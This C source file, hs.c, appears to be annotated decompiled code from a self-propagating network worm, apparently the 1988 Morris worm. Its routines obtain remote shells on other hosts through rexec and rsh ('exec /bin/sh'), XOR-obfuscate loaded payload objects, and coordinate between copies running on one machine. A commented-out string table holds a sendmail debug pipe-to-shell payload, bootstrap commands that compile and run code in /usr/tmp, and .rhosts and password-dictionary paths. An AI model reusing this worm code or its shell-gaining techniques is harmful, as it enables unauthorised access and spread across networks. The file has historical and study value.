📄 hs.c
struct hst *host;{ char username[256]; char buffer2[512]; char local[8]; int result, i, fd_for_sh; /* 780, 784, 788 */ if (host == me) return 0; /* 530 */ if (host->flag & HST_HOSTTWO) /* Already tried ??? */ return 0; if (host->o48[0] || host->hostname == NULL) getaddrs(host); if (host->o48[0] == 0) { host->flag |= HST_HOSTFOUR; return 0; } strncpy(username, username2, sizeof(username)-1); username[sizeof(username)-1] = '\0'; if (username[0] == '\0') strcpy(username, alt_username); for (i = 0; username[i]; i++) if (ispunct(username[i]) || username[i] < ' ') return 0; other_sleep(1); fd_for_sh = x538e(host, username, &alt_username[30]); if (fd_for_sh >= 0) { result = talk_to_sh(host, fd_for_sh, fd_for_sh); close(fd_for_sh); return result; } if (fd_for_sh == -2) return 0; fd_for_sh = x538e(me, alt_username, &alt_username[30]); if (fd_for_sh >= 0) { sprintf(buffer2, XS("exec /usr/ucb/rsh %s -l %s \'exec /bin/sh\'\n"), host->hostname, username); send_text(fd_for_sh, buffer2); sleep(10); result = 0; if (test_connection(fd_for_sh, fd_for_sh, 25)) /* 508 */ result = talk_to_sh(host, fd_for_sh, fd_for_sh); close(fd_for_sh); return result; } return 0;}/* Used in hu1. Returns a file descriptor. *//* It goes through the six connections in host trying to connect to the * remote execution server on each one. 
*/
/*
 * x538e — try to obtain a shell on `host` through its remote-execution
 * service.
 *
 * Walks the six addresses in host->o48[] (zero entries are skipped) and
 * connects to IPPORT_EXECSERVER on each, with an 8-second alarm around
 * connect() (justreturn is installed as the SIGALRM handler; it is defined
 * elsewhere).  On the first address that accepts, it writes four
 * NUL-terminated strings — "", name1, name2 and "/bin/sh" — then waits up
 * to 20 s for a single NUL byte in reply and for test_connection() to
 * succeed.
 *
 * Returns: the connected socket on success; -1 if a connection was made
 * but the exchange failed (the socket is closed); -2 if no address
 * accepted a connection.
 *
 * NOTE(review): the rexec wire format is <stderr-port><user><password>
 * <command>, so the leading "" is presumably an empty stderr-port field
 * and name1/name2 the username and password — confirm against the caller.
 * The write()s of name1 and name2 are unchecked; only the final write()
 * and the reply are tested.  No htons() is applied to the port; the byte
 * order is as in the original binary — confirm for the target host.
 * l6 and l7 are declared but never used.
 */
static int x538e(host, name1, name2)
    struct hst *host;
    char *name1, *name2;
{
    int s, i;
    struct sockaddr_in sin;                 /* 16 bytes */
    int l6, l7;
    char in_buf[512];

    for (i = 0; i < 6; i++) {               /* 552,762 */
        if (host->o48[i] == 0)
            continue;                       /* 754 */
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
            continue;
        bzero(&sin, sizeof(sin));           /* 16 */
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = host->o48[i];
        sin.sin_port = IPPORT_EXECSERVER;   /* Oh shit, looking for rexd */
        /* Bound connect() to 8 s: SIGALRM is meant to interrupt it. */
        alarm(8);
        signal(SIGALRM, justreturn);
        if (connect(s, &sin, sizeof(sin)) < 0) {
            alarm(0);
            close(s);
            continue;
        }
        alarm(0);
        break;
    }
    if (i >= 6)
        return -2;                          /* 1048: no address reachable */

    /* Check out the connection by writing a null (the single byte written
     * is the terminator of the empty string). */
    if (write(s, XS(""), 1) == 1) {
        /* Send the two names and the command "/bin/sh", each with its
         * terminating NUL, then expect one NUL byte back (presumably the
         * daemon's success indication) before handing the socket over. */
        write(s, name1, strlen(name1) + 1);
        write(s, name2, strlen(name2) + 1);
        if ((write(s, XS("/bin/sh"), strlen(XS("/bin/sh"))+1) >= 0)
            && xread(s, in_buf, 1, 20) == 1
            && in_buf[0] == '\0'
            && test_connection(s, s, 40) != 0)
            return s;
    }
    close(s);
    return -1;
}

/*
 * loadobject — read the file `obj_name` into memory, pass it through
 * xorbuf() and append it to the global `objects` array.
 *
 * The entry's name is the part of obj_name after the first ',' (the whole
 * string when there is no comma); `size` and `buf` hold the file size and
 * the transformed contents.  Returns 1 on success, 0 if the file cannot be
 * opened, fstat'ed, allocated for, or read in full (fd and buffer are
 * released on every failure path).
 *
 * NOTE(review): nobjects is not checked against the capacity of objects[];
 * the malloc() for the name copy is not checked before strcpy(); read()'s
 * signed result is compared with the unsigned size (a negative return does
 * compare unequal, so errors are caught, but a short read counts as
 * failure rather than being retried).  `local[4]` is unused.
 */
loadobject(obj_name)                        /* x5594 */
    char *obj_name;
{
    int fd;
    unsigned long size;
    struct stat statbuf;
    char *object_buf, *suffix;
    char local[4];

    fd = open(obj_name, O_RDONLY);
    if (fd < 0)
        return 0;                           /* 378 */
    if (fstat(fd, &statbuf) < 0) {
        close(fd);
        return 0;
    }
    size = statbuf.st_size;
    object_buf = malloc(size);
    if (object_buf == 0) {
        close(fd);
        return 0;
    }
    if (read(fd, object_buf, size) != size) {
        free(object_buf);
        close(fd);
        return 0;
    }
    close(fd);
    xorbuf(object_buf, size);               /* (de)obfuscate in place */
    /* Name the object by the text after the first ','. */
    suffix = index(obj_name, ',');
    if (suffix != NULL)
        suffix+=1;
    else
        suffix = obj_name;
    objects[nobjects].name = strcpy(malloc(strlen(suffix)+1), suffix);
    objects[nobjects].size = size;
    objects[nobjects].buf = object_buf;
    nobjects += 1;
    return 1;
}

/*
 * getobjectbyname — return the entry of the 'objects' array whose name
 * matches `name`, or NULL if there is none.
*/
object *getobjectbyname(name)
    char *name;
{
    int i;

    /* Linear scan; strcmp() means the match is exact and case-sensitive. */
    for (i = 0; i < nobjects; i++)
        if (strcmp(name, objects[i].name) == 0)
            return &objects[i];
    return NULL;
}

/*
 * xorbuf — obfuscate / de-obfuscate `size` bytes of `buf` in place.
 *
 * The key is the first 10 bytes of xorbuf's own machine code (addr_self
 * points at the function itself), applied cyclically.  XOR with a fixed
 * key is its own inverse, so the same call encodes and decodes; the key
 * therefore depends on the exact binary the function was compiled into.
 */
xorbuf(buf, size)                           /* 0x577e */
    char *buf;
    unsigned long size;
{
    char *addr_self;                        /* The address of the xorbuf function */
    int i;

    addr_self = (char *)xorbuf;
    i = 0;
    while (size-- > 0) {
        *buf++ ^= addr_self[i];
        i = (i+1) % 10;
    }
    return;
}

/* Listening socket on which another instance may contact this process;
 * -1 until checkother() has set one up (or after answer_other() gave it
 * up).  Implicit int. */
static other_fd = -1;

/*
 * checkother — look for an instance already running on this machine,
 * decide which of the two should exit, then start listening ourselves.
 *
 * One call in seven (random() % 7 == 3) returns immediately and does
 * neither.  Otherwise: connect to 127.0.0.1 on the fixed port 0x5b3d; if
 * something is listening, send MAGIC_2, wait up to five minutes for
 * MAGIC_1, then exchange one random()/8 value each way.  When the sum of
 * the two random values is even this (connecting) process bumps
 * pleasequit; the listener in answer_other() yields on an odd sum instead,
 * so exactly one side gives up when the exchange completes.  Any failure
 * in that exchange returns without setting up a listener.  Finally, after
 * a 5 s pause, a SO_REUSEADDR socket is bound to the same loopback
 * address/port, listen()ed with backlog 10, and stored in other_fd.
 *
 * NOTE(review): the 1-in-7 early return means such an instance never
 * negotiates with an existing one here.  The 5 s sleep presumably gives a
 * losing peer time to close its listener before this one binds the same
 * port; if bind() fails anyway, other_fd stays -1.  The port constant is
 * used without htons(), as in the original binary.
 */
checkother()                                /* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;                 /* 16 bytes */

    optval = 1;
    if ((random() % 7) == 3)
        return;                             /* 612 */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));               /* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1"));   /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;              /* ??? */
    if (connect(s, &sin, sizeof(sin)) < 0) {
        /* connect failed (e.g. nobody listening): skip the negotiation and
         * go straight to setting up our own listener below. */
        close(s);
    } else {
        l8 = MAGIC_2;                       /* Magic number??? */
        if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
            close(s);
            return;
        }
        l8 = 0;
        if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
            close(s);
            return;
        }
        if (l8 != MAGIC_1) {
            close(s);
            return;
        }
        l12 = random()/8;
        if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
            close(s);
            return;
        }
        if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
            close(s);
            return;
        }
        /* Even sum: this side loses the coin toss and asks to quit. */
        if (!((l12+l16) % 2))
            pleasequit++;
        close(s);
    }
    sleep(5);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    /* Set the socket so that the address may be reused */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
    if (bind(s, &sin, sizeof(sin)) < 0) {
        close(s);
        return;
    }
    listen(s, 10);
    other_fd = s;
    return;
}

/*
 * other_sleep — sleep for `how_long` seconds, servicing any peer that
 * connects to other_fd in the meantime.
*/
other_sleep(how_long)                       /* 0x5a38; how_long is an implicit int */
{
    int nfds, readmask;
    long time1, time2;
    struct timeval timeout;

    /* No listener: plain sleep.  A zero how_long does not sleep at all.
     * NOTE(review): a negative how_long reaches sleep() unclamped here —
     * the clamp to 0 below only covers the select() path. */
    if (other_fd < 0) {
        if (how_long != 0)
            sleep(how_long);
        return;
    }
    /* Check once again.. */
    do {
        if (other_fd < 0)                   /* answer_other() may have closed it */
            return;
        readmask = 1 << other_fd;           /* int used as a one-word fd set: only fds below the width of int fit */
        if (how_long < 0)
            how_long = 0;
        timeout.tv_sec = how_long;
        timeout.tv_usec = 0;
        if (how_long != 0)
            time(&time1);
        nfds = select(other_fd+1, &readmask, 0, 0, &timeout);
        if (nfds < 0)
            sleep(1);
        /* NOTE(review): readmask is not cleared when select() fails, so
         * answer_other() may be entered with nothing pending and its
         * accept() could block. */
        if (readmask != 0)
            answer_other();
        /* Charge the elapsed wall-clock time against the remaining budget. */
        if (how_long != 0) {
            time(&time2);
            how_long -= time2 - time1;
        }
    } while (how_long > 0);
    return;
}

/*
 * answer_other — handle one peer connecting to other_fd (the counterpart
 * of the connecting side in checkother()).
 *
 * Accepts the connection, sends MAGIC_1, expects MAGIC_2 back within 10 s,
 * then sends random()/8 and reads the peer's value within 10 s.  If the
 * peer came from 127.0.0.1 and the sum of the two random values is odd,
 * this (listening) side yields: the listener is closed, other_fd is set to
 * -1 and pleasequit is bumped.  The connecting side quits on an even sum
 * instead, so only one of the two gives up.
 *
 * NOTE(review): the loopback check is applied only after the full exchange
 * has taken place; since checkother() binds the listener to 127.0.0.1 the
 * check should be redundant in practice.  Any protocol failure closes the
 * accepted socket and returns without changing state.
 */
static answer_other()                       /* 0x5b14 */
{
    int ns, addrlen, magic_holder, magic1, magic2;
    struct sockaddr_in sin;                 /* 16 bytes */

    addrlen = sizeof(sin);
    ns = accept(other_fd, &sin, &addrlen);
    if (ns < 0)
        return;                             /* 620 */
    magic_holder = MAGIC_1;
    if (write(ns, &magic_holder, sizeof(magic_holder)) != sizeof(magic_holder)) {
        close(ns);
        return;
    }
    if (xread(ns, &magic_holder, sizeof(magic_holder), 10) != sizeof(magic_holder)) {
        close(ns);
        return;
    }
    if (magic_holder != MAGIC_2) {
        close(ns);
        return;
    }
    magic1 = random() / 8;
    if (write(ns, &magic1, sizeof(magic1)) != sizeof(magic1)) {
        close(ns);
        return;
    }
    if (xread(ns, &magic2, sizeof(magic2), 10) != sizeof(magic2)) {
        close(ns);
        return;
    }
    close(ns);
    if (sin.sin_addr.s_addr != inet_addr(XS("127.0.0.1")))
        return;
    /* Odd sum: this side loses and stops listening. */
    if (((magic1+magic2) % 2) != 0) {
        close(other_fd);
        other_fd = -1;
        pleasequit++;
    }
    return;
}

/*
 * xread — read exactly `length` bytes from `fd` into `buf`, one byte at a
 * time, allowing up to `time` seconds of waiting for each byte (so the
 * total wait can reach length * time).
 *
 * Returns `length` when every byte arrived, 0 on a select() error, a
 * timeout, or a read() that does not deliver one byte.  A partial count is
 * never returned; callers compare the result against the full size.
 *
 * NOTE(review): the parameter `time` shadows the time(2) function inside
 * this body (harmless: time() is not called here); cc, nfds, time1 and
 * time2 are unused; `1 << fd` only works for fds below the width of int;
 * and `i < length` compares an int with an unsigned long.
 */
xread(fd, buf, length, time)                /* 0x5ca8 */
    int fd, time;
    char *buf;
    unsigned long length;
{
    int i, cc, readmask;
    struct timeval timeout;
    int nfds;
    long time1, time2;

    for (i = 0; i < length; i++) {          /* 150 */
        readmask = 1 << fd;
        timeout.tv_sec = time;
        timeout.tv_usec = 0;
        if (select(fd+1, &readmask, 0, 0, &timeout) < 0)
            return 0;                       /* 156 */
        if (readmask == 0)
            return 0;                       /* timed out */
        if (read(fd, &buf[i], 1) != 1)
            return 0;
    }
    return i;
}

/*
 * These are some of the strings that are enciphered in the binary.
The person that wrote the program probably used the Berkeley 'xstr'
 * program to extract and encipher the strings.
 *
 * NOTE(review): nothing below is compiled (an #ifdef notdef block and a
 * comment); it is a reconstruction of the string table.  Strings of
 * security interest visible in it: an SMTP session that starts with
 * `debug` and uses a piped `rcpt to:<"| sed ... | /bin/sh">` recipient,
 * `exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'` for rsh-based access, the
 * /etc/hosts.equiv, .rhosts and .forward format strings, and the
 * /usr/dict/words path — consistent with the rsh/rexec code above.
 */
#ifdef notdef
char environ[50] = "";
char *sh = "sh";
char *env52 = "sh";                         /* 0x20034, <environ+52> */
char *env55 = "-p";
char *env58 = "l1.c";
char *env63 = "sh";
char *env66 = "/tmp/.dump";
char *env77 = "128.32.137.13";
char *env91 = "127.0.0.1";
char *env102 = "/usr/ucb/netstat -r -n";   /* 0x20066 */
char *env125 = "r";
char *env127 = "%s%s";
#endif /* notdef*/

/* char *text = "default 0.0.0.0 127.0.0.1 exec /bin/sh l1.c PATH=/bin:/usr/bin:/usr/ucb cd /usr/tmp x%d.c echo gorch49;sed '/int zz;/q' > %s;echo gorch50 gorch49 int zz; gorch50 cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE DONE x%d,%s PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then P=x%d else P=sh cc -o $P %s ./$P -p $$ rm -f $P rm -f %s $P l1.c cd /usr/tmp x%d.c cat > %s <<'EOF' cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c /usr/ucb/rsh /usr/bin/rsh /bin/rsh /bin/echo %s debug mail from:</dev/null> rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0"> data quit quit exec /usr/ucb/rsh %s -l %s 'exec /bin/sh' /bin/sh /bin/sh 127.0.0.1 127.0.0.1 /etc/hosts.equiv %.100s /.rhosts %.200s/.forward %.20s%.20s %[^ ,] %*s %[^ ,]s %.200s/.forward %.200s/.rhosts %s%s /usr/dict/words"; */

/*
 * Local variables:
 * compile-command: "cc -S hs.c"
 * comment-column: 48
 * End:
 */